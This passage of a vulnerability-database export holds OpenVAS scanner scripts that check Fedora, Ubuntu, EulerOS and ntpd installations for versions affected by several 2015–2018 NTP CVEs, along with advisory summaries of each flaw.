Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875100\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-27 08:45:54 +0200 (Thu, 27 Sep 2018)\");\n script_cve_id(\"CVE-2018-12327\", \"CVE-2018-7170\", \"CVE-2016-1549\", \"CVE-2018-7182\",\n \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2018-7051d682fa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7051d682fa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEPFU3UKOCOC2AUNLFMW6VQI3EN47FB6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p12~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310843586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843586", "type": "openvas", "title": "Ubuntu Update for ntp USN-3707-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3707_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ntp USN-3707-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843586\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 05:56:31 +0200 (Tue, 10 Jul 2018)\");\n script_cve_id(\"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ntp USN-3707-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yihan Lian discovered that NTP incorrectly handled certain malformed mode 6\npackets. A remote attacker could possibly use this issue to cause ntpd to\ncrash, resulting in a denial of service. This issue only affected Ubuntu\n17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses.\nA remote attacker could possibly use this issue to execute arbitrary code.\n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. A remote attacker could possibly use this issue to\ncause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu\n18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. A remote attacker could possibly use this issue to\ncause a denial of service. (CVE-2018-7185)\");\n script_tag(name:\"affected\", value:\"ntp on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3707-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3707-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu2.14.04.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p10+dfsg-5ubuntu3.3\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p10+dfsg-5ubuntu7.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p4+dfsg-3ubuntu5.9\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7183", "CVE-2018-7182"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812790", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812790", "type": "openvas", "title": "NTP.org 'ntpd' 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812790\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7182\", \"CVE-2018-7183\");\n script_bugtraq_id(103191, 103351);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 11:25:49 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3412\");\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3414\");\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error in 'ctl_getitem()' which is used by ntpd to process incoming mode\n 6 packets. A malicious mode 6 packet can be sent to an ntpd instance,\n will cause 'ctl_getitem()' to read past the end of its buffer.\n\n - An error in 'decodearr()' which is used by ntpq can write beyond its buffer limit.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code and obtain sensitive information that may lead to\n further attacks.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions from 4.2.8p6 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP version 4.2.8p11\n or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\\.8\") {\n if((revcomp(a:version, b:\"4.2.8p6\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T16:53:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201210", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201210", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1210)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1210\");\n script_version(\"2020-03-13T07:14:54+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:14:54 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:14:54 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1210)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1210\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1210\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1210 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nNTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192215", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192215", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2215)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2215\");\n script_version(\"2020-01-23T12:40:10+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:40:10 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:40:10 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2215)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2215\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2215\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-2215 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7170"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812793", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812793", "type": "openvas", "title": "NTP.org 'ntpd' Authenticated Symmetric Passive Peering Remote Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP Authenticated Symmetric Passive Peering Remote Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812793\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7170\");\n script_bugtraq_id(103194);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 12:17:55 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' Authenticated Symmetric Passive Peering Remote Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3454\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a remote security vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to if a system is\n set up to use a trustedkey and if one is not using the feature introduced in\n ntp-4.2.8p6 allowing an optional 4th field in the ntp.keys file to specify\n which IPs can serve time.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions and perform some unauthorized\n actions to the application. This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd version 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p7 or 4.2.8p11\n or 4.3.92.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\") {\n if(revcomp(a:version, b:\"4.2.8p7\") < 0) {\n fix = \"4.2.8p7 or 4.2.8p11\";\n }\n}\nelse if(version =~ \"^4\\.3\") {\n if(revcomp(a:version, b:\"4.3.92\") < 0) {\n fix = \"4.3.92 or 4.2.8p11\";\n }\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812792", "type": "openvas", "title": "NTP.org 'ntpd' 'protocol engine' Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'protocol engine' Denial of Service Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812792\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 12:09:28 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'protocol engine' Denial of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3454\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to a bug that was\n inadvertently introduced into the 'protocol engine' that allows a non-authenticated\n zero-origin (reset) packet to reset an authenticated interleaved peer association.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause 